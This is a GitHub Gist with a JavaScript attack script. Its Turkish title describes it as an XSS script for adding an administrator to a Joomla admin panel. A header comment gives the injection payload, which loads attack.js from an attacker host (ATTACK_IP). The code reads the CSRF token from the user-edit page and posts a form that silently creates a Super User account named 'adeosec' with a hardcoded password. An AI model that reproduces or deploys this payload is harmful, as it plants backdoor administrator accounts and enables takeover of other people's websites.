Created
May 31, 2016 18:02
-
-
Save MuhammetDilmac/c680cc921143543561bfdfd7b25da1ca to your computer and use it in GitHub Desktop.
Joomla admin panel admin ekleme XSS scripti
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/* | |
* Author: Gökmen Güreşçi & Muhammet Dilmaç | |
* Saldırı payloadı | |
* <script>var script = document.createElement('script');script.src = "http://ATTACK_IP/attack.js";document.getElementsByTagName('head')[0].appendChild(script);</script> | |
*/ | |
var request = new XMLHttpRequest(); | |
var req = new XMLHttpRequest(); | |
var id = ''; | |
var boundary = Math.random().toString().substr(2); | |
var space = "-----------------------------"; | |
request.open('GET', 'index.php?option=com_users&view=user&layout=edit', true); | |
request.onload = function() { | |
if (request.status >= 200 && request.status < 400) { | |
var resp = request.responseText; | |
var myRegex = /<input type="hidden" name="([a-z0-9]+)" value="1" \/>/; | |
id = myRegex.exec(resp)[1]; | |
req.open('POST', 'index.php?option=com_users&layout=edit&id=0', true); | |
req.setRequestHeader("content-type", "multipart/form-data; boundary=---------------------------" + boundary); | |
var multipart = space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[name]\"" + | |
"\r\n\r\nADEO Security\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[username]\"" + | |
"\r\n\r\nadeosec\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[password]\"" + | |
"\r\n\r\n4d30s3cur1ty\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[password2]\"" + | |
"\r\n\r\n4d30s3cur1ty\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[email]\"" + | |
"\r\n\r\nspam@adeo.com.tr\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[registerDate]\"" + | |
"\r\n\r\n\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[lastvisitDate]\"" + | |
"\r\n\r\n\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[lastResetTime]\"" + | |
"\r\n\r\n\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[resetCount]\"" + | |
"\r\n\r\n0\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[sendEmail]\"" + | |
"\r\n\r\n0\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[block]\"" + | |
"\r\n\r\n0\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[requireReset]\"" + | |
"\r\n\r\n0\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[id]\"" + | |
"\r\n\r\n0\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[groups][]\"" + | |
"\r\n\r\n8\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[params][admin_style]\"" + | |
"\r\n\r\n\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[params][admin_language]\"" + | |
"\r\n\r\n\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[params][language]\"" + | |
"\r\n\r\n\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[params][editor]\"" + | |
"\r\n\r\n\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[params][helpsite]\"" + | |
"\r\n\r\n\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"jform[params][timezone]\"" + | |
"\r\n\r\n\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"task\"" + | |
"\r\n\r\nuser.apply\r\n" + | |
space + boundary + | |
"\r\nContent-Disposition: form-data; name=\"" + id + "\"" + | |
"\r\n\r\n1\r\n" + | |
space + boundary + "--\r\n"; | |
req.onload = function() { | |
if (req.status >= 200 && req.status < 400) { | |
var resp = req.responseText; | |
console.log(resp); | |
} | |
}; | |
req.send(multipart); | |
} | |
}; | |
request.send(); |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment